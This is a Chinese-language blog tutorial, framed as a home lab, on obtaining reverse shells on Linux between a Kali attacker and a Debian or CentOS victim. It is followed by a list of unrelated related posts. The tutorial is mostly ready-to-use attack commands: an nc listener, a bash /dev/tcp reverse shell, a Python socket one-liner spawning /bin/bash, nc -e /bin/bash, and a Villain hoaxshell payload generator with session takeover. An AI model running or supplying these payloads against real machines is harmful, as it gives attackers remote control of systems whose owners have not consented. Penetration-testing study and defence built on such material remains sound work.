2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

一台kali的linux(攻击者)

一台centos7/debian[另一个linux](受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

nc -lvp 自定义端口号

2、debian(受害者)运行命令

 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

二、python反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

nc -lvp 自定义端口号

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

三、nc反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

nc -lvp 自定义端口号

2、debian(受害者)运行命令

nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

whoami

四、villain反弹shell

1、kali(攻击者)运行命令

①运行villain,需要先安装哦

villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

shell sessionID

③whoami看一下权限

whoami
相关推荐
马立杰3 小时前
H3CNE-33-BGP
运维·网络·h3cne
云空4 小时前
《DeepSeek 网页/API 性能异常(DeepSeek Web/API Degraded Performance):网络安全日志》
运维·人工智能·web安全·网络安全·开源·网络攻击模型·安全威胁分析
深度Linux4 小时前
Linux网络编程中的零拷贝:提升性能的秘密武器
linux·linux内核·零拷贝技术
doubt。4 小时前
8.攻防世界Web_php_wrong_nginx_config
网络·安全·web安全·网络安全
没有名字的小羊5 小时前
Cyber Security 101-Build Your Cyber Security Career-Security Principles(安全原则)
运维·网络·安全
m0_465215795 小时前
TCP & UDP Service Model
服务器·网络·tcp/ip
千夜啊5 小时前
Nginx 运维开发高频面试题详解
运维·nginx·运维开发
存储服务专家StorageExpert6 小时前
答疑解惑:如何监控EMC unity存储系统磁盘重构rebuild进度
运维·unity·存储维护·emc存储
chian-ocean7 小时前
从理论到实践:Linux 进程替换与 exec 系列函数
linux·运维·服务器
aaaweiaaaaaa7 小时前
php的使用及 phpstorm环境部署
android·web安全·网络安全·php·storm